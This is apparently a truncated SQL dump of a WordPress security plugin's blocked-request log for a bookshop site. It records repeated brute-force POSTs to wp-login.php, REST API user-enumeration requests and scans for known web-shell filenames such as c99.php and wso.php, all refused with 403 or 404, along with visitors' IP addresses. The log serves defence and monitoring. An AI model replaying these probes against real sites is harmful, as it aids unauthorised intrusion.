,('3.16.255.251',51445755,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','M58oe4Svp7h2VDdUACl9mOib',0,1636210292.9012,430,'','POST',404,0,700,0,1,'',0),('3.16.255.251',51445755,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','hSapF1NeyBsxPUmjbc3E4HY5',0,1636210348.7555,407,'','POST',404,0,700,0,1,'',0),('3.16.255.251',51445755,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','jaPvbRh0wqLct9sIZ4XAQd6m',0,1636210401.8594,445,'','POST',404,0,700,0,1,'',0),('3.16.255.251',51445755,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','wA1esxDofpTinWbNkJGamVZU',0,1636210455.6565,523,'','POST',404,0,700,0,1,'',0),('3.16.255.251',51445755,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','CScdHFKEgUVeowiMYNyOk8Ab',0,1636210509.7974,423,'','POST',404,0,700,0,1,'',0),('3.16.255.251',51445755,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','XI4rDOLMbusvQCxYiT0qHN9K',0,1636210566.4929,1118,'','POST',404,0,700,0,1,'',0),('3.16.255.251',51445755,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','G9tAYrDxTvfoLX3FEgbP56kC',0,1636210621.8277,410,'','POST',404,0,700,0,1,'',0),('3.16.255.251',51445755,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','fbu04WRkq1dFCKvhBE7H5IDg',0,1636210677.9302,445,'','POST',404,0,700,0,1,'',0),('3.16.255.251',51445755,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','GyDE0VJe7ZOC3i4ukBqgoN1F',0,1636210732.2923,1141,'','POST',404,0,700,0,1,'',0),('3.16.255.251',51445755,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','FbSwsPJEQ8xduqo7IThy4U0X',0,1636210786.9764,559,'','POST',404,0,700,0,1,'',0),('3.16.255.251',51445755,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','BVXYoehayFRDI6ctUvnCQWN2',0,1636210850.1419,487,'','POST',404,0,700,0,1,'',0),('3.16.255.251',51445755,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','DqzJRr7Q9PGX3jlCknuLE1ph',0,1636210918.1066,504,'','POST',404,0,700,0,1,'',0),('3.16.255.251',51445755,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','HqgU2rujMy0xObahDzcGFwsT',0,1636210986.2235,440,'','POST',404,0,700,0,1,'',0),('3.16.255.251',51445755,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','ZWHa79hwkP2GXoLlDyzectmA',0,1636211052.4603,440,'','POST',404,0,700,0,1,'',0),('3.16.255.251',51445755,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','jU1nHVz0C6LpGe4DuKwqSsER',0,1636211117.8049,851,'','POST',404,0,700,0,1,'',0),('3.16.255.251',51445755,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','qDN9rSgylx2jE0ph8VoZs6Ld',0,1636211184.6095,449,'','POST',404,0,700,0,1,'',0),('3.16.255.251',51445755,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','BAGXzhY6bOQPS7UTkjuVWops',0,1636211252.6712,430,'','POST',404,0,700,0,1,'',0),('3.16.255.251',51445755,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','C5DVgAtf9z0OUdnB2rNlmPsj',0,1636211320.3217,465,'','POST',404,0,700,0,1,'',0),('3.16.255.251',51445755,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','HbW2YtTRv84qsSeJ0oZzhagw',0,1636211388.1027,421,'','POST',404,0,700,0,1,'',0),('3.16.255.251',51445755,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','f8gOPQiwSIhJbU2B5sjEMKcq',0,1636211453.7970,436,'','POST',404,0,700,0,1,'',0),('3.16.255.251',51445755,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','9bC3ZAFspkDhPLBWSQftq6Il',0,1636211519.0844,484,'','POST',404,0,700,0,1,'',0),('3.16.255.251',51445755,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','Np92sjFXn0eDCmEOTKYkItSH',0,1636211588.2519,439,'','POST',404,0,700,0,1,'',0),('3.16.255.251',51445755,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','u4WmsPAx9F3cKgbrReQl02Xn',0,1636211655.8368,474,'','POST',404,0,700,0,1,'',0),('3.16.255.251',51445755,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','SCP80NdUQmszVRiTW75nuDxK',0,1636211724.7255,962,'','POST',404,0,700,0,1,'',0),('3.16.255.251',51445755,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','OkfQqvAibBXUj51umetohwGZ',0,1636211794.4389,431,'','POST',404,0,700,0,1,'',0),('3.16.255.251',51445755,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','F6kxW9uXl5nsb2TjDHNoPvrZ',0,1636211863.8813,790,'','POST',404,0,700,0,1,'',0),('3.16.255.251',51445755,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','hEx6nYLmOsjogbac9T70iARS',0,1636211936.4767,407,'','POST',404,0,700,0,1,'',0),('3.16.255.251',51445755,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','3dycijF6IsVNWBnwl5Jukf28',0,1636212007.8091,408,'','POST',404,0,700,0,1,'',0),('3.16.255.251',51445755,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','pSvdT7e9FKZIRJzmsBQyNhwl',0,1636212079.5052,1324,'','POST',404,0,700,0,1,'',0),('3.16.255.251',51445755,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','A2Lz8x5HNsW1YrJbf0h6gtOu',0,1636212148.4088,463,'','POST',404,0,700,0,1,'',0),('3.16.255.251',51445755,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','EDV4uQdPgU1h6eOCKlIq70WG',0,1636212215.8107,575,'','POST',404,0,700,0,1,'',0),('3.16.255.251',51445755,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','ucQANa7iRO5vhsT4qXbZG1LE',0,1636212284.1371,419,'','POST',404,0,700,0,1,'',0),('3.16.255.251',51445755,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','bTtSjkn7vGR3xPE9JHZYcsAz',0,1636212352.8803,423,'','POST',404,0,700,0,1,'',0),('3.16.255.251',51445755,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','dD5KW4gTr6uiMXRjvIGAkSps',0,1636212421.2582,847,'','POST',404,0,700,0,1,'',0),('3.16.255.251',51445755,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','SC7rAELUokTzl6gvjMynQOBD',0,1636212491.0607,528,'','POST',404,0,700,0,1,'',0),('3.16.255.251',51445755,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','IEl05H71mNO2Kc6kbhT3BwJG',0,1636212557.9031,466,'','POST',404,0,700,0,1,'',0),('3.16.255.251',51445755,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','LIETXCuGSlbnVpkY8Ps0yhRQ',0,1636212627.7924,590,'','POST',404,0,700,0,1,'',0),('3.16.255.251',51445755,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','XU489OazpjG07nPNybdZtRwe',0,1636212700.7218,760,'','POST',404,0,700,0,1,'',0),('3.16.255.251',51445755,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','xrnhVNSbc1OFX5BpPE2jtzTu',0,1636212773.1863,435,'','POST',404,0,700,0,1,'',0),('3.16.255.251',51445755,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','gfJEV9X51srNilLYKkCdFMAw',0,1636212843.1589,472,'','POST',404,0,700,0,1,'',0),('3.16.255.251',51445755,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','aKmDQbezdc4rvYSTjRgCxMZw',0,1636212910.5064,1155,'','POST',404,0,700,0,1,'',0),('3.16.255.251',51445755,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','taCqFr8bpQyJ729eAMYVBOx0',0,1636212980.3257,483,'','POST',404,0,700,0,1,'',0),('3.16.255.251',51445755,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','8IGnbM6VNjztu3ep1lsYcx4y',0,1636213050.5774,554,'','POST',404,0,700,0,1,'',0),('3.16.255.251',51445755,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','CQ2nmYUasdpBfb3Ph8eAuIgk',0,1636213121.3118,438,'','POST',404,0,700,0,1,'',0),('3.16.255.251',51445755,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','sZ1VDcy7mOCBq43LxnHepKAt',0,1636213189.0082,415,'','POST',404,0,700,0,1,'',0),('3.16.255.251',51445755,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','38mbHp4ZQ1L29yUxjDvfu7CR',0,1636213257.1773,746,'','POST',403,0,600,0,1,'',0),('3.16.255.251',51445755,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','8PcLUoFA5dstNGajfyhklu9n',0,1636213328.0353,481,'','POST',404,0,700,0,1,'',0),('3.16.255.251',51445755,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','F4BtHIPzfN9QDyZU0m7s5liG',0,1636213401.4019,456,'','POST',404,0,700,0,1,'',0),('3.16.255.251',51445755,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','Ln5U6yaiQ7YWE9Dtbslkcrjw',0,1636213473.2326,446,'','POST',404,0,700,0,1,'',0),('3.16.255.251',51445755,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','uT0kORXIrzlmnECbNQoVqLA3',0,1636213542.3970,414,'','POST',404,0,700,0,1,'',0),('3.16.255.251',51445755,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','A2CsUIbBiENRocWyz1w7ePOM',0,1636213608.9923,462,'','POST',404,0,700,0,1,'',0),('3.16.255.251',51445755,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','GKvFMxUY52se64d1bLtDoJ9r',0,1636213676.8535,498,'','POST',404,0,700,0,1,'',0),('3.16.255.251',51445755,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','c5a38DSMBItuFZPwXWj7e9HR',0,1636213745.8963,715,'','POST',404,0,700,0,1,'',0),('3.16.255.251',51445755,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','2IGjUs9adxXhivFebtnfS6Wq',0,1636213814.5665,410,'','POST',404,0,700,0,1,'',0),('3.16.255.251',51445755,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','1mLY2WEFu4PayQ9T8efBvXxR',0,1636213882.9562,485,'','POST',404,0,700,0,1,'',0),('3.16.255.251',51445755,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','GXkQVLFbDcKupr2iId9henZE',0,1636213948.5909,423,'','POST',404,0,700,0,1,'',0),('3.16.255.251',51445755,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','tDCsxcZAGfeawEkiSPU0Kjqr',0,1636214015.2470,476,'','POST',404,0,700,0,1,'',0),('3.16.255.251',51445755,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','UTtQRb75dW4p0vXIk8yaqfzA',0,1636214083.8656,414,'','POST',404,0,700,0,1,'',0),('3.16.255.251',51445755,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','Z9oA3vE8UPcYVyhguRNjTWe5',0,1636214152.2864,401,'','POST',404,0,700,0,1,'',0),('3.16.255.251',51445755,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','6perFUn3tuISX8kHQdN0Vj5z',0,1636214220.9218,411,'','POST',404,0,700,0,1,'',0),('3.16.255.251',51445755,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','cXZCrQDew1q8PbMTt9Josl7R',0,1636214288.7296,405,'','POST',404,0,700,0,1,'',0),('3.16.255.251',51445755,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','U6mIDvinM9ykdXPGZCA3K2f1',0,1636214353.8259,486,'','POST',404,0,700,0,1,'',0),('3.16.255.251',51445755,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','rmUIJqbx9Ry7HgBeZc2F5CDN',0,1636214422.0322,437,'','POST',404,0,700,0,1,'',0),('3.16.255.251',51445755,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','0p47tnDRswAJvuyOTUKYgXmq',0,1636214492.8181,178,'','POST',404,0,700,0,1,'',0),('3.16.255.251',51445755,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','uYHb7WNgAxj6C3J0qZvFtPE4',0,1636214563.6870,430,'','POST',404,0,700,0,1,'',0),('107.150.57.37',1805007141,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit\\/537.76.4 (KHTML, like Gecko) Version\\/7.0.4 Safari\\/537.76.4\"}','2INoLAslyKJmxQr1WSa7udv4',0,1636214626.1188,452,'','POST',403,0,600,0,1,'',0),('3.16.255.251',51445755,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','hKPw9tzoOE5HRcWTBXdV2FfN',0,1636214635.2685,936,'','POST',404,0,700,0,1,'',0),('3.16.255.251',51445755,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','H3rGx7a0IEmkzB4USXnRMlvC',0,1636214702.4682,420,'','POST',404,0,700,0,1,'',0),('3.16.255.251',51445755,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','A9tacBqp2ZJzLrPdSDy3RMnF',0,1636214770.3786,456,'','POST',404,0,700,0,1,'',0),('103.120.169.62',1735960894,'','https://ashbooks.co.uk//wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\"}','FKLq9IMSZHea3v87pfCgOzEY',0,1636231305.4644,267,'','GET',403,0,520,0,1,'',0),('45.64.54.158',759183006,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/49.0.2623.112 Safari\\/537.36\"}','wKkVdbE6MgDS9NoeHrTvhJFi',0,1636235356.3020,546,'','POST',403,0,600,0,1,'',0),('82.208.189.233',1389411817,'','https://ashbooks.co.uk/xmrlpc.php?daksldlkdsadas=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/49.0.2632.17 Safari\\/537.36\"}','q8QEn9GAr5mBDb6Uh0sFfkTY',0,1636240104.6513,501,'','GET',403,0,700,0,1,'',0),('157.245.174.114',2650123890,'','https://ashbooks.co.uk/x.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','8GANFD3EfPOxgQRsejTVMlqc',0,1636244623.8469,466,'','GET',403,0,700,0,1,'',0),('157.245.174.114',2650123890,'','https://ashbooks.co.uk/alfa.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','5Qm3lunRVtFka1ANdXPECMGz',0,1636244624.6361,147,'','GET',403,0,700,0,1,'',0),('157.245.174.114',2650123890,'','https://ashbooks.co.uk/c99.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','8hLnrBxiORHCpPMuoGbUaZv9',0,1636244625.0846,452,'','GET',403,0,700,0,1,'',0),('157.245.174.114',2650123890,'','https://ashbooks.co.uk/mini.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','ClX7Z8g3jN4xnwLdoaBFiWJ5',0,1636244625.8478,133,'','GET',403,0,700,0,1,'',0),('157.245.174.114',2650123890,'','https://ashbooks.co.uk/a.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','9KmpBUEcPyRoJTx8FgnMk5Yi',0,1636244626.2835,424,'','GET',403,0,700,0,1,'',0),('157.245.174.114',2650123890,'','https://ashbooks.co.uk/wso.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','IRlpCnXa2F7Zv6yAQmzxfE4b',0,1636244627.0512,609,'','GET',403,0,700,0,1,'',0),('157.245.174.114',2650123890,'','https://ashbooks.co.uk/wp-content/plugins/dzs-zoomsounds/wp_mnax.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','hHcxT16DInBZ0KqmeEAspLUR',0,1636244627.9604,173,'','GET',403,0,700,0,1,'',0),('157.245.174.114',2650123890,'','https://ashbooks.co.uk/leafmailer.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','fKHrX3p1Py28kZNa7uFsGOTo',0,1636244629.0238,389,'','GET',403,0,700,0,1,'',0),('157.245.174.114',2650123890,'','https://ashbooks.co.uk/le.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','SzOsTPjiKlwc9vYJHu08nD1V',0,1636244629.7196,142,'','GET',403,0,700,0,1,'',0),('157.245.174.114',2650123890,'','https://ashbooks.co.uk/1index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','IxFd0Q9SA8jyHeMqKYsp3J6D',0,1636244630.1684,381,'','GET',403,0,700,0,1,'',0),('157.245.174.114',2650123890,'','https://ashbooks.co.uk/fw.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','PJj1OCqVZlotN6LQ4yUBxwMf',0,1636244630.8418,139,'','GET',403,0,700,0,1,'',0),('54.193.101.186',918644154,'','https://ashbooks.co.uk//wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.114 Safari\\/537.36\"}','4gDJKw2tCh5PVuQp9Ueo0rni',0,1636245291.5114,1084,'','GET',403,0,520,0,1,'',0),('54.193.101.186',918644154,'','https://ashbooks.co.uk//wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.114 Safari\\/537.36\"}','Mv0aRYbGdOpJLyqmTHljguef',0,1636246837.7260,1091,'','GET',403,0,520,0,1,'',0),('82.208.189.233',1389411817,'','https://ashbooks.co.uk/1index.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/49.0.2647.30 Safari\\/537.36\"}','bpSKrumgO8R5UjlECisqMoQw',0,1636248682.8232,358,'','GET',403,0,700,0,1,'',0),('35.192.102.215',599811799,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','W8T1KyRZpo7CIFSiMlQmHhvO',0,1636252603.4915,518,'','POST',403,0,600,0,1,'',0),('82.223.69.194',1390364098,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.99 Safari\\/537.36\"}','Y4hbidJ25qONcrus8Rt7InHW',0,1636263091.7528,1874,'','POST',403,0,600,0,1,'',0),('5.188.62.76',96222796,'','https://ashbooks.co.uk/wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2224.3 Safari\\/537.36\"}','jfdhFw08zykEbX1o4csQa39Y',0,1636267782.7622,450,'','GET',403,0,520,0,1,'',0),('161.35.225.67',2703483203,'','https://ashbooks.co.uk//wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\"}','m8MQdlIXHyD1e6JOr74Si0Zn',0,1636274067.0378,459,'','GET',403,0,520,0,1,'',0),('161.35.225.67',2703483203,'','https://ashbooks.co.uk//wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\\/\\/wp-login.php\"}','9L7GeK1ZWJOjEmb6HQ3CMaU2',0,1636274068.6107,201,'','POST',403,0,600,0,1,'',0),('5.188.62.76',96222796,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2226.0 Safari\\/537.36\"}','DLElo65FspMeQHI7fu1GzVky',0,1636297354.9452,514,'','POST',403,0,600,0,1,'',0),('192.187.118.203',3233511115,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Ubuntu Chromium\\/36.0.1985.125 Chrome\\/36.0.1985.125 Safari\\/537.36\"}','Jo7LrKdafxTENQYX1HSh6A0W',0,1636298278.2518,455,'','POST',403,0,600,0,1,'',0),('157.245.174.114',2650123890,'','https://ashbooks.co.uk/x.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','ieVvZCA8JpNxUwBFuY5QhlXy',0,1636303583.6552,499,'','GET',403,0,700,0,1,'',0),('157.245.174.114',2650123890,'','https://ashbooks.co.uk/alfa.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','MX2uVv57yrmS8GZ0iWcdn61U',0,1636303584.4823,470,'','GET',403,0,700,0,1,'',0),('157.245.174.114',2650123890,'','https://ashbooks.co.uk/c99.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','U9yKiQeNFghHTd7ak1o0Jsjn',0,1636303585.2834,477,'','GET',403,0,700,0,1,'',0),('157.245.174.114',2650123890,'','https://ashbooks.co.uk/mini.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','VLDgm8kqh17zTY3jHa0IQwXn',0,1636303586.0817,451,'','GET',403,0,700,0,1,'',0),('157.245.174.114',2650123890,'','https://ashbooks.co.uk/a.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','XInvfxOVlSBYPpCkbUgA8ENm',0,1636303586.8810,167,'','GET',403,0,700,0,1,'',0),('157.245.174.114',2650123890,'','https://ashbooks.co.uk/wso.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','xHOF7vdk1aA4fnjtgIUEJqPX',0,1636303587.4573,463,'','GET',403,0,700,0,1,'',0),('157.245.174.114',2650123890,'','https://ashbooks.co.uk/wp-content/plugins/dzs-zoomsounds/wp_mnax.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','DEICTcUNZK2mQthv3d9OLFP7',0,1636303588.2745,457,'','GET',403,0,700,0,1,'',0),('157.245.174.114',2650123890,'','https://ashbooks.co.uk/leafmailer.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','FCeHktB2u1dYETDPOhW708po',0,1636303589.6189,1057,'','GET',403,0,700,0,1,'',0),('157.245.174.114',2650123890,'','https://ashbooks.co.uk/le.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','5cQ6wjyXV1vpiWJq7PuNdEHa',0,1636303591.8634,456,'','GET',403,0,700,0,1,'',0),('157.245.174.114',2650123890,'','https://ashbooks.co.uk/1index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','EXbqmItOlSW8vPCQA5hk0H4J',0,1636303592.6328,291,'','GET',403,0,700,0,1,'',0),('157.245.174.114',2650123890,'','https://ashbooks.co.uk/fw.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','KncDpFaJMztw5vGlOBmU2Ixj',0,1636303593.2461,439,'','GET',403,0,700,0,1,'',0),('107.150.57.38',1805007142,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','BtIxV5vDYKWTZ3qML6bX9ln4',0,1636314095.8784,590,'','POST',403,0,600,0,1,'',0),('40.79.249.244',676329972,'','https://ashbooks.co.uk//wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4240.193 Safari\\/537.36\"}','2h5VYXvKJa7iqbyzGx8LZSps',0,1636316581.6240,1935,'','GET',403,0,520,0,1,'',0),('40.79.249.244',676329972,'','https://ashbooks.co.uk//wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4240.193 